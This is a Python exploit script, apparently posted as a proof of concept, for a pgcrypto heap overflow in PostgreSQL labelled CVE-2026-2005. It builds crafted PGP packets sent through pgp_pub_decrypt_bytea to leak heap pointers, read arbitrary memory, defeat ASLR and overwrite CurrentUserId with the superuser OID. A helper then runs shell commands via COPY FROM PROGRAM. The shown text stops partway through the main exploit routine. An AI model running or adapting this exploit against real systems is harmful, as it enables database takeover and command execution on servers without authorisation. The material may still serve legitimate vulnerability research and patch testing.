README.md
Rendering markdown...
#!/usr/bin/python
import argparse
import re
import struct
import secrets
import subprocess
import sys
import time
from typing import Tuple
import psycopg2
# pwn for binary manipulation and debugging
from pwn import *
context.arch = 'aarch64'
# Cryptographic libraries, to craft the PGP data.
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Util.number import inverse
# AES key used for session key encryption (16 bytes for AES-128)
AES_KEY = b'\x01' * 16
def generate_rsa_keypair(key_size: int = 2048) -> dict:
"""
Generate a fresh RSA key pair.
The generated key includes all components needed for PGP operations:
- n: public modulus (p * q)
- e: public exponent (typically 65537)
- d: private exponent (e^-1 mod phi(n))
- p, q: prime factors of n
- u: coefficient (p^-1 mod q) for CRT optimization
The caller can pass the wanted key size in input, for a default of 2048
bytes. This function returns the RSA key components, after performing
some validation on them.
"""
# Generate RSA key
key = RSA.generate(key_size)
# Extract all key components
rsa_components = {
'n': key.n, # Public modulus (p * q)
'e': key.e, # Public exponent (typically 65537)
'd': key.d, # Private exponent (e^-1 mod phi(n))
'p': key.p, # First prime factor
'q': key.q, # Second prime factor
'u': inverse(key.p, key.q) # Coefficient for CRT: p^-1 mod q
}
# Validate key components for correctness
validate_rsa_key(rsa_components)
return rsa_components
def validate_rsa_key(rsa: dict) -> None:
"""
Validate a generated RSA key.
This function performs basic validation to ensure the RSA key is properly
constructed and all components are consistent, at least mathematically.
Validations performed:
1. n = p * q (modulus is product of primes)
2. gcd(e, phi(n)) = 1 (public exponent is coprime to phi(n))
3. (d * e) mod(phi(n)) = 1 (private exponent is multiplicative inverse)
4. (u * p) (mod q) = 1 (coefficient is correct for CRT)
"""
n, e, d, p, q, u = rsa['n'], rsa['e'], rsa['d'], rsa['p'], rsa['q'], rsa['u']
# Check that n = p * q
if n != p * q:
raise ValueError("RSA validation failed: n <> p * q")
# Check that p and q are different
if p == q:
raise ValueError("RSA validation failed: p = q (not allowed)")
# Calculate phi(n) = (p-1)(q-1)
phi_n = (p - 1) * (q - 1)
# Check that gcd(e, phi(n)) = 1
def gcd(a, b):
while b:
a, b = b, a % b
return a
if gcd(e, phi_n) != 1:
raise ValueError("RSA validation failed: gcd(e, phi(n)) <> 1")
# Check that (d * e) mod(lcm(p-1, q-1)) = 1
# PyCryptodome computes d using the Carmichael function lcm(p-1, q-1),
# not Euler's totient phi(n). Both satisfy the RSA requirement.
lambda_n = (p - 1) // gcd(p - 1, q - 1) * (q - 1)
if (d * e) % lambda_n != 1:
raise ValueError("RSA validation failed: d * e <> 1 (mod lcm(p-1, q-1))")
# Check that (u * p) (mod q) = 1
if (u * p) % q != 1:
raise ValueError("RSA validation failed: u * p <> 1 (mod q)")
def mpi_encode(x: int) -> bytes:
"""
Encode an integer as an OpenPGP Multi-Precision Integer (MPI).
Format (RFC 4880, Section 3.2):
- 2 bytes: bit length of the integer (big-endian)
- N bytes: the integer in big-endian format
This is used to encode RSA key components (n, e, d, p, q, u) in PGP
packets.
The integer to encode is given in input, returning an MPI-encoded
integer.
For example:
mpi_encode(65537) -> b'\x00\x11\x01\x00\x01'
(17 bits, value 0x010001)
"""
if x < 0:
raise ValueError("MPI cannot encode negative integers")
if x == 0:
# Special case: zero has 0 bits and empty magnitude
bits = 0
mag = b""
else:
# Calculate bit length and convert to bytes
bits = x.bit_length()
mag = x.to_bytes((bits + 7) // 8, 'big')
# Pack: 2-byte bit length + magnitude bytes
return struct.pack('>H', bits) + mag
def new_packet(tag: int, payload: bytes) -> bytes:
"""
Create a new OpenPGP packet with a proper header.
OpenPGP packet format (RFC 4880, Section 4.2):
- New packet format: 0xC0 | tag
- Length encoding depends on payload size:
* 0-191: single byte
* 192-8383: two bytes (192 + ((length - 192) >> 8), (length - 192) & 0xFF)
* 8384+: five bytes (0xFF + 4-byte big-endian length)
The packet is built from a "tag" (1-63) and some "payload" data. The
result generated is a complete OpenPGP packet.
For example:
new_packet(1, b'data') -> b'\xC1\x04data'
(Tag 1, length 4, payload 'data')
"""
# New packet format: set bit 7 and 6, clear bit 5, tag in bits 0-5
first = 0xC0 | (tag & 0x3F)
ln = len(payload)
# Encode length according to OpenPGP specification
if ln <= 191:
# Single byte length for small packets
llen = bytes([ln])
elif ln <= 8383:
# Two-byte length for medium packets
ln2 = ln - 192
llen = bytes([192 + (ln2 >> 8), ln2 & 0xFF])
else:
# Five-byte length for large packets
llen = bytes([255]) + struct.pack('>I', ln)
return bytes([first]) + llen + payload
def build_key_data(rsa: dict) -> bytes:
"""
Build the key data, containing an RSA private key.
The RSA contents should have been generated previously.
Format (see RFC 4880, Section 5.5.3):
- 1 byte: version (4)
- 4 bytes: creation time (current Unix timestamp)
- 1 byte: public key algorithm (2 = RSA encrypt)
- MPI: RSA public modulus n
- MPI: RSA public exponent e
- 1 byte: string-to-key usage (0 = no encryption)
- MPI: RSA private exponent d
- MPI: RSA prime p
- MPI: RSA prime q
- MPI: RSA coefficient u = p^-1 mod q
- 2 bytes: checksum of private key material
This function takes a set of RSA key components in input (n, e, d, p, q, u)
and returns a secret key packet.
"""
# Public key portion
ver = bytes([4]) # Version 4 key
ctime = struct.pack('>I', int(time.time())) # Current Unix timestamp
algo = bytes([2]) # RSA encrypt algorithm
n_mpi = mpi_encode(rsa['n']) # Public modulus
e_mpi = mpi_encode(rsa['e']) # Public exponent
pub = ver + ctime + algo + n_mpi + e_mpi
# Private key portion
hide_type = bytes([0]) # No string-to-key encryption
d_mpi = mpi_encode(rsa['d']) # Private exponent
p_mpi = mpi_encode(rsa['p']) # Prime p
q_mpi = mpi_encode(rsa['q']) # Prime q
u_mpi = mpi_encode(rsa['u']) # Coefficient u = p^-1 mod q
# Calculate checksum of private key material (simple sum mod 65536)
private_data = d_mpi + p_mpi + q_mpi + u_mpi
cksum = sum(private_data) & 0xFFFF
secret = hide_type + private_data + struct.pack('>H', cksum)
payload = pub + secret
return new_packet(7, payload)
def pgp_cfb_encrypt_resync(key, plaintext):
"""
Implement OpenPGP CFB mode with resync.
OpenPGP CFB mode is a variant of standard CFB with a resync operation
after the first two blocks.
Algorithm (RFC 4880, Section 13.9):
1. Block 1: FR=zeros, encrypt full block_size bytes
2. Block 2: FR=block1, encrypt only 2 bytes
3. Resync: FR = block1[2:] + block2
4. Remaining blocks: standard CFB mode
This function uses the following arguments:
- key: AES encryption key (16 bytes for AES-128)
- plaintext: Data to encrypt
"""
block_size = 16 # AES block size
cipher = AES.new(key[:16], AES.MODE_ECB) # Use ECB for manual CFB
ciphertext = b''
# Block 1: FR=zeros, encrypt full 16 bytes
FR = b'\x00' * block_size
FRE = cipher.encrypt(FR) # Encrypt the feedback register
block1 = bytes(a ^ b for a, b in zip(FRE, plaintext[0:16]))
ciphertext += block1
# Block 2: FR=block1, encrypt only 2 bytes
FR = block1
FRE = cipher.encrypt(FR)
block2 = bytes(a ^ b for a, b in zip(FRE[0:2], plaintext[16:18]))
ciphertext += block2
# Resync: FR = block1[2:16] + block2[0:2]
# This is the key difference from standard CFB mode
FR = block1[2:] + block2
# Block 3+: Continue with standard CFB mode
pos = 18
while pos < len(plaintext):
FRE = cipher.encrypt(FR)
chunk_len = min(block_size, len(plaintext) - pos)
chunk = plaintext[pos:pos+chunk_len]
enc_chunk = bytes(a ^ b for a, b in zip(FRE[:chunk_len], chunk))
ciphertext += enc_chunk
# Update feedback register for next iteration
if chunk_len == block_size:
FR = enc_chunk
else:
# Partial block: pad with old FR bytes
FR = enc_chunk + FR[chunk_len:]
pos += chunk_len
return ciphertext
def build_literal_data_packet(data: bytes) -> bytes:
"""
Build a literal data packet containing a message.
Format (RFC 4880, Section 5.9):
- 1 byte: data format ('b' = binary, 't' = text, 'u' = UTF-8 text)
- 1 byte: filename length (0 = no filename)
- N bytes: filename (empty in this case)
- 4 bytes: date (current Unix timestamp)
- M bytes: literal data
The data used to build the packet is given in input, with the generated
result returned.
"""
body = bytes([
ord('b'), # Binary data format
0, # Filename length (0 = no filename)
]) + struct.pack('>I', int(time.time())) + data # Current timestamp + data
return new_packet(11, body)
def build_symenc_data_packet(sess_key: bytes, cipher_algo: int, payload: bytes) -> bytes:
"""
Build a symmetrically-encrypted data packet using AES-128-CFB.
This packet contains encrypted data using the session key. The format
includes a random prefix, for security (see RFC 4880, Section 5.7).
Packet structure:
- Random prefix (block_size bytes)
- Prefix repeat (last 2 bytes of prefix repeated)
- Encrypted literal data packet
This function uses the following set of arguments:
- sess_key: Session key for encryption
- cipher_algo: Cipher algorithm identifier (7 = AES-128)
- payload: Data to encrypt (wrapped in literal data packet)
"""
block_size = 16 # AES-128 block size
key = sess_key[:16] # Use first 16 bytes for AES-128
# Create random prefix + repeat last 2 bytes (total 18 bytes)
# This is required by OpenPGP for integrity checking
prefix_random = secrets.token_bytes(block_size)
prefix = prefix_random + prefix_random[-2:] # 18 bytes total
# Wrap payload in literal data packet
literal_pkt = build_literal_data_packet(payload)
# Plaintext = prefix + literal data packet
plaintext = prefix + literal_pkt
# Encrypt using OpenPGP CFB mode with resync
ciphertext = pgp_cfb_encrypt_resync(key, plaintext)
return new_packet(9, ciphertext)
def build_tag1_packet(rsa: dict, sess_key: bytes) -> bytes:
"""
Build a public-key encrypted key.
This is a very important function, as it is able to create the packet
triggering the overflow check. This function can also be used to create
"legit" packet data.
Format (RFC 4880, Section 5.1):
- 1 byte: version (3)
- 8 bytes: key ID (0 = any key accepted)
- 1 byte: public key algorithm (2 = RSA encrypt)
- MPI: RSA-encrypted session key
This uses in arguments the generated RSA key pair, and the session key
to encrypt. The latter is manipulated to trigger the overflow.
This function returns a complete packet encrypted by a session key.
"""
# Calculate RSA modulus size in bytes
n_bytes = (rsa['n'].bit_length() + 7) // 8
# Session key message format:
# - 1 byte: symmetric cipher algorithm (7 = AES-128)
# - N bytes: session key
# - 2 bytes: checksum (simple sum of session key bytes)
algo_byte = bytes([7]) # AES-128 algorithm identifier
cksum = sum(sess_key) & 0xFFFF # 16-bit checksum
M = algo_byte + sess_key + struct.pack('>H', cksum)
# PKCS#1 v1.5 padding construction
# Format: 0x02 || PS || 0x00 || M
# Total padded message must be exactly n_bytes long.
total_len = n_bytes # Total length must equal modulus size in bytes
ps_len = total_len - len(M) - 2 # Subtract 2 for 0x02 and 0x00 bytes
if ps_len < 8:
raise ValueError(f"Padding string too short ({ps_len} bytes); need at least 8 bytes. "
f"Message length: {len(M)}, Modulus size: {n_bytes} bytes")
# Create padding string with *ALL* bytes being 0xFF (no zero separator!)
PS = bytes([0xFF]) * ps_len
# Construct the complete padded message
# Normal PKCS#1 v1.5 padding: 0x02 || PS || 0x00 || M
padded = bytes([0x02]) + PS + bytes([0x00]) + M
# Verify padding construction
if len(padded) != n_bytes:
raise ValueError(f"Padded message length ({len(padded)}) doesn't match RSA modulus size ({n_bytes})")
# Convert padded message to integer and encrypt with RSA
m_int = int.from_bytes(padded, 'big')
# Ensure message is smaller than modulus (required for RSA)
if m_int >= rsa['n']:
raise ValueError("Padded message is larger than RSA modulus")
# RSA encryption: c = m^e mod n
c_int = pow(m_int, rsa['e'], rsa['n'])
# Encode encrypted result as MPI
c_mpi = mpi_encode(c_int)
# Build complete packet
ver = bytes([3]) # Version 3 packet
key_id = b"\x00" * 8 # Key ID (0 = any key accepted)
algo = bytes([2]) # RSA encrypt algorithm
payload = ver + key_id + algo + c_mpi
return new_packet(1, payload)
SRC_CHUNK_OFFSET = 100
DST_CHUNK_OFFSET = 172
SRC_CHUNK_HDR = [
0x01, 0x01, 0x72, 0xaa, 0xbb, 0xbe, 0x00, 0x00,
0x63, 0x00, 0x00, 0x00, 0xc0, 0x04, 0x00, 0x00
]
def build_leak_mdst_ptr_payload(rsa: dict) -> bytes:
"""
Build a crafted PGP message to leak the mdst data pointer via
the pfree() invalid pointer error message.
Returns a concatenated set of PGP packets crafted for heap
exploitation. The mdst chunk headers are set up so that the
mbuf struct's data pointer is exposed by a pfree() error.
After the first run leaks the pointer, a second payload can target
the correct address for arbitrary read.
How it works:
------------
The crafted prefix is embedded into an RSA-encrypted session key
packet (Tag 1). During decryption, the session key bytes are parsed
as a length prefix for mbuf chunk allocation. By crafting the session
key bytes to match a fake chunk header (SRC_CHUNK_HDR), we overflow
the mdst buffer's malloc chunk metadata. When PostgreSQL later tries
to pfree() the corrupted chunk, it detects the invalid chunk header
and throws an error message containing the invalid pointer address,
effectively leaking the mdst->data heap pointer to us.
The three-packet structure (Tag1, SymEnc, Tag1) ensures:
- First Tag1: sets up the overflow payload
- SymEnc: provides the cover encrypted data packet
- Second Tag1: triggers the actual overflow during session key handling
"""
# Craft the overflow payload: fill with padding, insert a fake source
# chunk header at SRC_CHUNK_OFFSET, then place a fake destination
# chunk header at DST_CHUNK_OFFSET with controlled values that
# corrupt the malloc metadata for the mdst buffer.
payload = b"\x01" * 32
payload += b"\x02" * (SRC_CHUNK_OFFSET - len(payload))
payload += bytes(SRC_CHUNK_HDR)
payload += b"\x00" * (DST_CHUNK_OFFSET - len(payload))
payload += bytes([
0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42,
0x42, 0x42, 0x42, 0x42,
])
prefix = payload + p32(len(payload))
sedata = build_symenc_data_packet(AES_KEY, cipher_algo=7, payload=b"\x0a\x00")
packets = [
build_tag1_packet(rsa, prefix),
sedata,
build_tag1_packet(rsa, prefix),
]
return b"".join(packets)
def build_sql(message_data: bytes, key_data: bytes) -> str:
"""Build the SQL query from message and key hex data."""
msg_hex = message_data.hex()
key_hex = key_data.hex()
msg_hex = re.sub("(.{72})", "\\1\n", msg_hex, 0, re.DOTALL)
key_hex = re.sub("(.{72})", "\\1\n", key_hex, 0, re.DOTALL)
return f'''SELECT pgp_pub_decrypt_bytea(
'\\x{msg_hex}'::bytea,
'\\x{key_hex}'::bytea);'''
def generate_payload(rsa: dict, mode: str, leaked_ptr: int|None = None) -> Tuple[bytes, bytes]:
"""
Generate the PGP message and key data using the selected mode.
In 'leak' mode: craft a payload that corrupts mdst chunk header and
leaks the heap pointer via the pfree() error message.
In 'exploit' mode: craft a payload that overwrites mdst->data with
(leaked_ptr - 0x10000), causing the decryption output to contain memory
from 0x10000 bytes before the leaked heap location. This region may
contain PIE code pointers from earlier allocations, which we scan to
resolve the ASLR base.
"""
if mode == 'exploit' and leaked_ptr is not None:
message_data = build_arb_read_payload(rsa, leaked_ptr - 0x10000)
else:
message_data = build_leak_mdst_ptr_payload(rsa)
key_data = build_key_data(rsa)
return message_data, key_data
def get_conn(conn_params: dict):
"""Create and return a psycopg2 connection from conn_params dict."""
conn = psycopg2.connect(
host=conn_params.get('host', ''),
port=conn_params.get('port', 5432),
dbname=conn_params.get('dbname', 'postgres'),
user=conn_params.get('user', ''),
password=conn_params.get('password', ''),
)
conn.autocommit = True
return conn
def conn_params_from_args(args) -> dict:
"""Extract connection parameters from parsed CLI args into a dict."""
return {
'host': args.host,
'port': args.port,
'dbname': args.dbname or 'postgres',
'user': args.user,
'password': args.password or '',
}
def execute_sql(sql: str, conn_params: dict, use_gdb: bool = False, ret_conn = False):
"""Execute SQL against PostgreSQL, return result string (data or error)."""
conn = get_conn(conn_params)
cur = conn.cursor()
cur.execute("SELECT pg_backend_pid()")
pid = cur.fetchone()[0]
print(f"### Backend PID: {pid}", file=sys.stderr)
if use_gdb:
print("### Attaching GDB in tmux pane...", file=sys.stderr)
print("### In the GDB pane: type 'continue' to resume the backend,", file=sys.stderr)
print("### then 'continue' again through the breakpoint to trigger the overflow.",
file=sys.stderr)
gdb.attach(pid, gdbscript="""set architecture aarch64
set breakpoint pending on
b pgp-decrypt.c:1123
b parse_symenc_data
b pgp-pgsql.c:528
continue
""")
time.sleep(2)
def to_hex(v):
if isinstance(v, memoryview):
return v.tobytes().hex()
return str(v)
print("### Executing query...", file=sys.stderr)
try:
cur.execute(sql)
rows = cur.fetchall()
formatted = [[to_hex(v) for v in row] for row in rows]
result = str(formatted)
except Exception as e:
result = str(e)
if ret_conn:
return conn
return result
def load_symbols(binary_path: str) -> list:
"""
Load symbol offsets from a binary ELF using readelf.
Returns a list of (name, offset, size) tuples sorted by offset.
"""
try:
out = subprocess.check_output(
['readelf', '-sW', binary_path],
stderr=subprocess.DEVNULL
).decode()
except (subprocess.CalledProcessError, FileNotFoundError) as e:
raise RuntimeError(f"cannot read symbols from {binary_path}: {e}")
symbols = []
for line in out.splitlines():
parts = line.split()
# readelf -sW: Num: Value Size Type Bind Vis Ndx Name
if len(parts) < 8:
continue
try:
offset = int(parts[1], 16)
size = int(parts[2])
except ValueError:
continue
typ = parts[3]
name = parts[7]
if typ not in ('FUNC', 'OBJECT'):
continue
if offset == 0:
continue
symbols.append((name, offset, size))
symbols.sort(key=lambda x: x[1])
return symbols
def resolve_pie_base(leaked_addrs: list, symbols: list, page_size: int = 0x1000) -> dict:
"""
Stage 4: Match leaked absolute addresses against known ELF symbol
offsets to compute PIE base candidates via a voting mechanism.
PIE (Position Independent Executable) loads the binary at a random
base address. Each symbol's runtime address = PIE_base + sym_offset.
For each (leaked_addr, sym_offset) pair:
PIE_base = leaked_addr - sym_offset
This subtraction only yields a valid page-aligned base when both
share the same page offset (low 12 bits). So we only consider
(leaked_addr, sym_offset) pairs where the page offset matches.
Each matching pair casts a "vote" for its computed base. The true
PIE base should accumulate many votes because multiple symbols'
addresses are stored on the heap near eath other.
Filtering:
- Candidates with >= 10 votes are kept (noise floor)
- Take the 10 smallest bases (PIE is the lowest-mapped ELF segment)
- Sort by votes descending (best candidate first)
Returns a dict: {pie_base: vote_count} sorted by votes descending.
"""
votes = {}
mask = page_size - 1
for addr in leaked_addrs:
lo_page = addr & mask
for _name, sym_off, _sz in symbols:
if (sym_off & mask) != lo_page:
continue
if sym_off >= addr:
continue
base = addr - sym_off
votes[base] = votes.get(base, 0) + 1
# Filter to candidates with >= 10 votes, take the 10 smallest bases
# (PIE is always the lowest-mapped ELF), then sort by votes descending.
filtered = {k: v for k, v in votes.items() if v >= 10}
sorted_by_addr = sorted(filtered.items(), key=lambda x: x[0])[:10]
sorted_by_votes = sorted(sorted_by_addr, key=lambda x: x[1], reverse=True)
return dict(sorted_by_votes)
def build_arb_write_payload(rsa: dict, mdst_addr: int, target_addr: int) -> bytes:
"""
Stage 6: Build a crafted PGP message that overwrites memory at
target_addr with attacker-controlled data.
This is the most delicate part of the exploit. The overflow corrupts
both the mdst AND the msrc MBuf chunk headers. After the overflow,
the msrc pointer (source buffer) is corrupted, so we must carefully
reconstruct it to point at valid PGP data.
Key insight — we embed a symenc data packet (sedata2) at the end of
our payload. This packet contains the data we want to write (in this
case, p32(10) = superuser OID). We forge msrc->data and
msrc->read_pos to point into this embedded symenc packet, so the
decryption engine reads from it and writes the decrypted result into
the corrupted mdst buffer (which points at target_addr).
We use target_addr - 4 because pgp_pgsql.c:533 does:
res_len = mbuf_steal_data(dst, &restmp);
SET_VARSIZE(res, res_len);
SET_VARSIZE writes the length into the first 4 bytes of the output
buffer. So to overwrite CurrentUserId starting at its actual address,
we need to account for the 4-byte SET_VARSIZE header.
"""
# sedata: small symenc packet for cover (needed for initial packet parsing)
sedata = build_symenc_data_packet(AES_KEY, cipher_algo=7, payload=b"\x0a")
# sedata2: the write payload — when decrypted, produces p32(10)+p32(10)
# which contains the value 10 (superuser OID) to overwrite CurrentUserId.
# We embed this at a known offset and point msrc at it.
sedata2 = build_symenc_data_packet(AES_KEY, cipher_algo=7, payload=p32(10)+p32(10))
# Forged mdst MBuf: the destination buffer. data pointer set to target_addr
# so that decrypted output is written there, overwriting CurrentUserId.
mdst = p64(target_addr) # data = target address
mdst += p64(target_addr) # data_end
mdst += p64(target_addr) # read_pos (unused for dst)
mdst += p64(0xffffffffffff) # buf_end = huge (prevent repalloc)
mdst += b'\x00' * 2 # no_write=0, own_data=0
# Forged msrc MBuf: the source buffer. After the overflow corrupts the
# real msrc, we forge a new one whose data/read_pos point at sedata2,
# the symenc packet embedded at the end of the payload.
# The offsets are relative to mdst_addr (the heap address we leaked):
# mdst struct ends at mdst_addr + len(mdst)
# sedata2 starts right after mdst (at mdst_addr + len(mdst))
# sedata2 ends at mdst_addr + len(mdst) + len(sedata2)
msrc = p64(mdst_addr + len(mdst)) # data = start of sedata2
msrc += p64(mdst_addr + len(mdst) + len(sedata2)) # data_end = end of sedata2
msrc += p64(mdst_addr + len(mdst)) # read_pos = start of sedata2
msrc += p64(0xffffffffffff) # buf_end = huge (prevent repalloc)
msrc += b'\x00' * 2 # no_write=0, own_data=0
msrc += b'\x00' * 6 # padding
# Build the overflow payload: padding + fake src chunk header + forged
# msrc struct + padding + fake dst chunk header + forged mdst struct.
payload = b'\x01' * 16
payload += p32(0x10)
payload += p32(0x10)
payload += p32(0x10)
payload += p32(0x10)
payload += p32(0x10)
payload += b"\x01" * (SRC_CHUNK_OFFSET - len(payload))
payload += bytes(SRC_CHUNK_HDR)
payload += msrc
payload += b"\x00" * (DST_CHUNK_OFFSET - len(payload))
payload += bytes([
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x63, 0x00, 0x00, 0x00, 0xe0, 0x05, 0x00, 0x00,
])
# Append sedata2 (the write payload) right after the mdst struct.
# The msrc pointers we forged above reference this exact data.
mdst += sedata2
payload += mdst
prefix = payload + p32(len(payload))
packets = [
build_tag1_packet(rsa, prefix),
]
return b"".join(packets)
def build_arb_read_payload(rsa: dict, target_addr: int, read_size: int = 0x10000) -> bytes:
"""
Stage 2: Build a crafted PGP message that reads memory from target_addr.
After leaking the mdst heap pointer, we craft a second payload that
overwrites the mdst MBuf's data pointer to point at an arbitrary
address. After successful decryption, pgp_pgsql.c calls
mbuf_steal_data(dst, &restmp) which returns dst->data as the output
bytea. By setting dst->data = target_addr, we can read arbitrary
memory — in this case, we read from leaked_ptr - 0x10000 to dump
heap memory and find PIE (Position Independent Executable) addresses
that can be used to resolve the ASLR base.
The mdst struct fields we forge:
data = target_addr (where to read from)
data_end = target_addr + read_size (bounds check bypass)
read_pos = target_addr (unused for destination buffer)
buf_end = 0x7fffffffffff (huge value, prevents repalloc from moving the buffer)
no_write = 0, own_data = 0
"""
# Fake encrypted data packet for msrc buf — provides cover for the
# decryption stream so the packet processing doesn't abort early.
sedata = build_symenc_data_packet(AES_KEY, cipher_algo=7, payload=b"\x0a")
# Build overflow prefix that corrupts the dst chunk header and
# overlays a fake MBuf struct at DST_CHUNK_OFFSET.
payload = b'\x01' * 16
payload += p32(0x10)
payload += b"\x01" * (SRC_CHUNK_OFFSET - len(payload))
payload += bytes(SRC_CHUNK_HDR)
payload += b"\x00" * (DST_CHUNK_OFFSET - len(payload))
payload += bytes([
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x63, 0x00, 0x00, 0x00, 0xe0, 0x05, 0x00, 0x00,
])
# Fake mdst MBuf pointing at the target address
mdst = p64(target_addr) # data = target address
mdst += p64(target_addr + read_size) # data_end
mdst += p64(target_addr) # read_pos (unused for dst)
mdst += p64(0x7fffffffffff) # buf_end = huge (prevent repalloc)
mdst += b'\x00' * 2 # no_write=0, own_data=0
mdst += b'\x00' * 6 # padding
payload += mdst
prefix = payload + p32(len(payload))
packets = [
build_tag1_packet(rsa, b'\x01' * 16),
sedata,
build_tag1_packet(rsa, prefix),
]
return b"".join(packets)
# ---------------------------------------------------------------------------
# Exploit stages — each function handles one discrete step of the exploit.
# ---------------------------------------------------------------------------
def leak_mdst_pointer(rsa: dict, conn_params: dict) -> int | None:
"""
Stage 1: Leak the mdst->data heap pointer via the pfree error message.
The overflow payload corrupts the malloc chunk header of the mdst buffer.
When PostgreSQL attempts to pfree() the mdst buffer at the end of
decryption, the allocator detects the corrupted chunk metadata and
raises an error: "pfree called with invalid pointer 0x...". We parse
this error message to extract the heap address of mdst->data.
"""
print("\n### === STAGE 1: leaking mdst pointer ===\n", file=sys.stderr)
msg, key = generate_payload(rsa, 'leak')
sql = build_sql(msg, key)
result = execute_sql(sql, conn_params, use_gdb=False)
match = re.search(r'pfree called with invalid pointer (0x[0-9a-fA-F]+)', result)
if not match:
print(f"ERROR: could not parse leaked pointer from: {result}", file=sys.stderr)
return None
leaked_ptr = int(match.group(1), 16)
print(f"### Leaked mdst ptr: 0x{leaked_ptr:x}", file=sys.stderr)
return leaked_ptr
def scan_for_pointers(result: str, leaked_ptr: int) -> list[int]:
"""
Stage 3: Scan leaked hex dump for non-heap pointer candidates.
The arbitrary read from stage 2 returns a hex dump of memory around
leaked_ptr - 0x10000. We scan this dump for 8-byte little-endian
values that look like code/data pointers (>= 0x500000000000) but
are NOT heap addresses (they don't share the heap region prefix).
These are potential PIE addresses that were stored on the heap and
can be used to resolve the postgres binary's ASLR base.
Because addresses may not be 8-byte aligned on the heap, we try
8 different alignments (0-7 byte offsets) when scanning.
"""
ADDR_LEN = 16
BYTE_STEP = 2
heap_region = leaked_ptr >> 28
print(f"### Heap region prefix: 0x{heap_region:010x}", file=sys.stderr)
hexdata = ''.join(c for c in result if c in '0123456789abcdef')
print(f"### Scanning {len(hexdata)} hex chars for pointers:", file=sys.stderr)
leaked_addrs = []
for align in range(8):
start = align * BYTE_STEP
for i in range(start, len(hexdata) - ADDR_LEN + 1, ADDR_LEN):
hex_slice = hexdata[i:i + ADDR_LEN]
try:
le_bytes = bytes.fromhex(hex_slice)
except ValueError:
continue
addr = int.from_bytes(le_bytes, 'little')
if addr < 0x500000000000:
continue
if (addr >> 28) == heap_region:
continue
if addr not in leaked_addrs:
leaked_addrs.append(addr)
print(f"### Collected {len(leaked_addrs)} unique non-heap candidates", file=sys.stderr)
return leaked_addrs
def find_symbol_offset(symbols: list, name: str) -> int | None:
"""Find the offset of a named symbol in the symbol list."""
for sym_name, off, _sz in symbols:
if sym_name == name:
return off
return None
def query_expected_oid(conn_params: dict) -> int:
"""Query the expected CurrentUserId OID from the database."""
conn = get_conn(conn_params)
cur = conn.cursor()
cur.execute("SELECT current_user::regrole::oid;")
oid = cur.fetchone()[0]
conn.close()
return oid
def test_pie_candidate(rsa: dict, conn_params: dict, base: int,
current_user_offset: int, expected_oid: int) -> int | None:
"""
Stage 5: Validate a PIE base candidate by performing an arbitrary read
of the CurrentUserId variable.
We know our own session's CurrentUserId OID (from querying the DB).
By reading CurrentUserId at (base + current_user_offset) via our
arbitrary read primitive, we can verify whether `base` is the correct
PIE base. If the value matches expected_oid, we've confirmed the base.
Returns the base if it matches, None otherwise.
"""
target = base + current_user_offset
print(f"### Testing PIE 0x{base:016x} (CurrentUserId @ 0x{target:016x})...", file=sys.stderr)
msg = build_arb_read_payload(rsa, target, read_size=0x10)
key = build_key_data(rsa)
sql = build_sql(msg, key)
result = execute_sql(sql, conn_params, use_gdb=False)
hexdata = ''.join(c for c in result if c in '0123456789abcdef')
if hexdata and len(hexdata) >= 8:
val = int.from_bytes(bytes.fromhex(hexdata[:8]), 'little')
match = "MATCH" if val == expected_oid else ""
print(f"### -> value: {val} (0x{val:x}) {match}", file=sys.stderr)
return base if val == expected_oid else None
print(f"### -> no data returned", file=sys.stderr)
return None
def execute_privileged_command(conn, cmd: str) -> str:
"""
Stage 7: Execute an OS command via COPY FROM PROGRAM.
After overwriting CurrentUserId to 10 (superuser OID), we can execute
COPY FROM PROGRAM which runs arbitrary shell commands on the server.
This confirms the exploit was successful.
"""
cur = conn.cursor()
cur.execute(f"""
CREATE TEMP TABLE cmd_out (line text);
COPY cmd_out FROM PROGRAM '{cmd}';
SELECT * FROM cmd_out;
""")
return '\n'.join([r[0] for r in cur.fetchall()])
def run_exploit(rsa: dict, conn_params: dict, binary_path: str, cmd: str, use_gdb: bool = False):
"""
Autonomous multi-stage exploit against CVE-2026-2005 (pgcrypto heap overflow).
Exploit flow (7 stages):
1. Heap pointer leak — corrupt mdst chunk header, parse pfree() error
2. Arbitrary read — overwrite mdst->data to (leaked_ptr - 0x10000),
dumping heap memory that may contain PIE code pointers.
3. Scan dump for non-heap addresses (candidate PIE pointers).
4. Vote on PIE base: match candidate addresses against ELF symbol
offsets from the postgres binary.
5. Validate best candidate by reading CurrentUserId and comparing
against our session's known OID.
6. Arbitrary write: forge both msrc and mdst MBufs. msrc points at
an embedded symenc packet containing encrypted superuser OID (10);
mdst points at CurrentUserId - 4 (to account for SET_VARSIZE).
7. Privilege escalation: with CurrentUserId=10, execute COPY FROM
PROGRAM to run arbitrary shell commands as the postgres OS user.
"""
# Stage 1: Leak mdst->data heap pointer via corrupted pfree() error
leaked_ptr = leak_mdst_pointer(rsa, conn_params)
if leaked_ptr is None:
return
# Stage 2: Overwrite mdst->data with (leaked_ptr - 0x10000) to perform
# an arbitrary read of heap memory just before our buffer. This region
# may contain stale PIE code pointers from earlier allocations.
print("\n### === STAGE 2: exploit with controlled pointer ===\n", file=sys.stderr)
msg, key = generate_payload(rsa, 'exploit', leaked_ptr)
sql = build_sql(msg, key)
result = execute_sql(sql, conn_params)
# Stage 3: Scan the leaked hex dump for non-heap addresses that look
# like code pointers (>= 0x500000000000, not matching heap region).
leaked_addrs = scan_for_pointers(result, leaked_ptr)
# Stage 4: Resolve PIE base by matching leaked addresses against ELF
# symbol offsets. Each (addr - sym_offset) that is page-aligned gets
# a vote. Filter to 10+ vote candidates, pick the smallest base (PIE
# is the lowest-mapped ELF), sort by votes descending.
print(f"### Loading symbols from {binary_path}...", file=sys.stderr)
symbols = load_symbols(binary_path)
print(f"### Loaded {len(symbols)} symbols", file=sys.stderr)
votes = resolve_pie_base(leaked_addrs, symbols)
for base, count in list(votes.items())[:10]:
print(f"### PIE candidate: 0x{base:016x} ({count} votes)", file=sys.stderr)
if not votes:
print(f"### No PIE candidates", file=sys.stderr)
return
current_user_offset = find_symbol_offset(symbols, 'CurrentUserId')
if current_user_offset is None:
print(f"### ERROR: CurrentUserId not found in symbols", file=sys.stderr)
return
